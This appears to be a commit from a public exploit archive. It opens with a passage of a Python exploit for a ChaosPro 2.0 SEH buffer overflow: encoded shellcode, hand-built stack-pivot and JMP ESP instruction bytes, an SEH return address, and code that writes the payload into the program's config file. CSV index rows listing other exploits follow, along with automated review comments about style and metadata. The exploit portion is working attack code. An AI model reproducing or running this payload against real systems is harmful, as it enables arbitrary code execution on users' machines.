"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
"\x6f\x39\x45\x41\x41"
) # 710 bytes
sploit += "A" * (2575 - 16 - 710)
################ First stage ####################
# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32 54 PUSH ESP
# 0012FF33 58 POP EAX
# 0012FF34 66:05 3C18 ADD AX,183C
# 0012FF38 50 PUSH EAX
# 0012FF39 5C POP ESP
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8
# target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
# 0: 25 28 28 28 28 and eax,0x28282828
# 5: 25 47 47 47 47 and eax,0x47474747
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 7f 01 01 01 sub eax,0x101017f
# 14: 2d 03 18 3e 3e sub eax,0x3e3e1803
# 19: 50 push eax
sploit += (
"\x25\x28\x28\x28\x28"
"\x25\x47\x47\x47\x47"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x7f\x01\x01\x01"
"\x2d\x03\x18\x3e\x3e"
"\x50"
) # 26 bytes
## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54 44 INC ESP
# 0012FF55 44 INC ESP
# 0012FF56 44 INC ESP
# 0012FF57 44 INC ESP
# 0012FF58 44 INC ESP
# 0012FF59 44 INC ESP
# 0012FF5A 44 INC ESP
# 0012FF5B 44 INC ESP
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8
## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
# 0: 25 02 02 02 02 and eax,0x2020202
# 5: 25 51 51 51 51 and eax,0x51515151
# a: 2d 7f 01 7f 7f sub eax,0x7f7f017f
# f: 2d 01 01 01 61 sub eax,0x61010101
# 14: 2d 64 08 6d 1f sub eax,0x1f6d0864
# 19: 50 push eax
sploit +=(
"\x25\x02\x02\x02\x02"
"\x25\x51\x51\x51\x51"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x01\x01\x01\x61"
"\x2d\x64\x08\x6d\x1f"
"\x50"
) # 26 bytes
## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C POP ESP
sploit += "\x5c" # 1
sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)
################ RET from SEH: JMP SHORT - 126 ####################
sploit += "\xeb\x80" + "\x41\x41" # 4
# 00401B44 |. 5F POP EDI
# 00401B45 |> 5E POP ESI
# 00401B46 \. C3 RETN
sploit += "\x44\x1b\x40\x00"
################ build the config ####################
## Running from just outside base directory of ChaosPro:
def ret_cfg(inp):
# do it live in PicturePath
cfg = """PicturePath %s""" % inp
with open("chaospro\\ChaosPro.cfg",'w') as F:
F.write(cfg)
F.close()
ret_cfg(sploit)
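Review bot: The `#!/usr/bin/env python2` shebang sits on line 8 after the header comments, so it has no effect; move it to line 1 and let the header follow. `F.close()` inside the `with` block is redundant since the context manager closes the file. The relative path `chaospro\\ChaosPro.cfg` depends on a working directory described only in a comment; checking that the directory exists would make the failure mode explicit. The header lacks the "CVE : N/A" line the other entries in this commit carry.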

@ -6581,6 +6581,7 @@ id,file,description,date,author,type,platform,port
47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows, 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows, 47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows, 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
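Review bot: 47552 is filed with type `dos` while its description is a Universal XSS; if the type column is meant to reflect impact, the classification should be reconsidered or the convention documented. The unchanged context lines in this rendering appear twice on each line, a side-by-side diff display artifact rather than CSV content; the added row itself is well-formed, including the trailing empty port field.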
@ -10733,6 +10734,8 @@ id,file,description,date,author,type,platform,port
47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris, 47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows, 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux, 47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
47549,exploits/windows/local/47549.txt,"JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path",2019-10-28,"Roberto Escamilla",local,windows,
47551,exploits/windows/local/47551.py,"ChaosPro 2.0 - Buffer Overflow (SEH)",2019-10-28,SYANiDE,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
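Review bot: The author column records SYANiDE for 47551 while the file header reads "Chase Hatch (SYANiDE)", and the date column records 2019-10-28 for both new rows while the file headers give 2019-09-09 (47549) and 2019-10-27 (47551). If the convention is publication date and author handle, the rows are consistent, but stating that convention once would stop the mismatches being read as errors.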
@ -41863,3 +41866,9 @@ id,file,description,date,author,type,platform,port
47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware, 47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware, 47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php, 47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,
47545,exploits/hardware/webapps/47545.txt,"Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery",2019-10-28,"Prof. Joas Antonio",webapps,hardware,
47546,exploits/php/webapps/47546.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection",2019-10-28,cakes,webapps,php,
47547,exploits/php/webapps/47547.txt,"Part-DB 0.4 - Authentication Bypass",2019-10-28,Marvoloo,webapps,php,
47548,exploits/php/webapps/47548.txt,"waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting",2019-10-28,cakes,webapps,php,
47550,exploits/php/webapps/47550.txt,"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection",2019-10-28,cakes,webapps,php,
47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,
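Review bot: Author is spelled "cakes" in rows 47546, 47548 and 47550 but "Cakes" in the corresponding file headers; pick one spelling. Row 47545 records 2019-10-28 where the file says Date: 2019-10-25, again fine only if the column is publication date. 47553 is the single .md entry among .txt files; given the Markdown headings in that file, the extension is correct.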
